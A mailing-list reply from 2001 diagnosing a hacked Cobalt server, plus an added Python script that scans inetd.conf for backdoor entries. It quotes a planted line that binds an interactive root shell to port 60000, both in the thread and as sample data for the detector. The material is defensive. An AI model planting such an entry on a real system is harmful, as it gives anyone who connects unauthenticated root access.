RE: [cobalt-users] Sigh, more security breaches
- Subject: RE: [cobalt-users] Sigh, more security breaches
- From: Reinoud van Leeuwen <rvanleeuwen@xxxxxxxxxxxx>
- Date: Fri Mar 9 02:45:15 2001
- List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>
> I think I have been cracked again despite having
> updated to the latest All-Security packages. The
> bottom of inetd.conf contains this line
>
> 60000 stream tcp nowait root /bin/sh sh -i
>
> Does this look familiar to anyone?
It looks like everybody that connects to port 60000 (by telnet) gets a root
prompt without asking for a password. Yes, it looks familiar; no, it should
not be there.
> Also, I cannot access my webpage site and email
> using the named domain -- but I can ping the named
> domain. I can access the webpage and retrieve
> emails using the numeric address though.
>
> Does anyone know what's going on here, and how
> to fix it?
You are hacked. The only way to be 100% sure you remove all possible
installed rootkits and trojans is to reinstall from a Cobalt restore CD, and
then restore your backups... (and make sure that your backups do not contain
rootkits...)
The second step is to find out *how* they came in, fix the hole and install
programs that monitor possible break-ins (plenty of info on the list lately).
Only put your rack back online after you've done all this, otherwise you might
be hacked again during the process. An automated hack takes only a few
minutes...
Good luck,
Reinoud
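The inetd.conf entry quoted above is the classic shape of an inetd backdoor: a service name that is just a port number, a shell interpreter as the server program, and root as the user. The following checker is an added example (it is not part of the original mailing-list post and is not a Cobalt tool). It parses inetd.conf-style lines and flags entries with any of those traits, which is the kind of routine check the reply recommends running after a rebuild. The sample configuration embedded in it is constructed for the example, modelled on a typical inetd.conf of that era; the rule set and the `Finding` structure are the example's own design, not something the post prescribes.

```python
#!/usr/bin/env python3
"""Flag inetd.conf entries that look like shell backdoors.

Added example, not code from the original post. Field layout follows the
classic inetd.conf format:
  service  socket_type  protocol  wait/nowait  user  server_program  [args...]
"""
import os
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Shell interpreters that have no business being an inetd service program.
SHELL_BINARIES = {"sh", "bash", "csh", "ksh", "tcsh", "zsh", "dash", "ash"}

# Constructed sample: three ordinary tcpd-wrapped services plus the entry
# quoted in the thread (a root shell on port 60000).
SAMPLE_INETD_CONF = "\n".join([
    "# constructed sample inetd.conf",
    "ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a",
    "telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd",
    "pop-3   stream  tcp     nowait  root    /usr/sbin/tcpd  ipop3d",
    "60000 stream tcp nowait root /bin/sh sh -i",
])


@dataclass
class Finding:
    lineno: int
    service: str
    user: str
    program: str
    reasons: List[str] = field(default_factory=list)


def parse_inetd_line(line: str) -> Optional[Dict[str, object]]:
    """Split one inetd.conf line into fields; None for blank/comment/malformed lines."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return None
    fields = stripped.split()
    if len(fields) < 6:
        return None  # too few fields to be a valid service entry
    service, sock_type, proto, wait, user, program = fields[:6]
    return {
        "service": service, "sock_type": sock_type, "proto": proto,
        "wait": wait, "user": user, "program": program, "args": fields[6:],
    }


def check_entry(entry: Dict[str, object], lineno: int) -> Optional[Finding]:
    """Apply the backdoor heuristics to one parsed entry."""
    reasons: List[str] = []
    prog_base = os.path.basename(str(entry["program"]))
    args = list(entry["args"])  # type: ignore[arg-type]

    if prog_base in SHELL_BINARIES:
        reasons.append("service program is a shell interpreter")
        if "-i" in args:
            reasons.append("shell is started interactively (-i)")
    if str(entry["service"]).isdigit():
        reasons.append("service name is a bare port number, not a name from /etc/services")
    # Root only makes the finding worse; on its own it is normal for tcpd-wrapped services.
    if reasons and entry["user"] == "root":
        reasons.append("runs as root")

    if not reasons:
        return None
    return Finding(lineno, str(entry["service"]), str(entry["user"]),
                   str(entry["program"]), reasons)


def scan_inetd_conf(text: str) -> List[Finding]:
    """Return a Finding for every suspicious entry in the given inetd.conf text."""
    findings: List[Finding] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        entry = parse_inetd_line(line)
        if entry is None:
            continue
        finding = check_entry(entry, lineno)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_inetd_conf(SAMPLE_INETD_CONF):
        print(f"line {f.lineno}: service={f.service} user={f.user} program={f.program}")
        for r in f.reasons:
            print(f"    - {r}")
```

Running it against a live system is `scan_inetd_conf(open("/etc/inetd.conf").read())`; the bare-port-number rule is deliberately a weak signal on its own, which is why the checker only escalates on root when another rule has already fired.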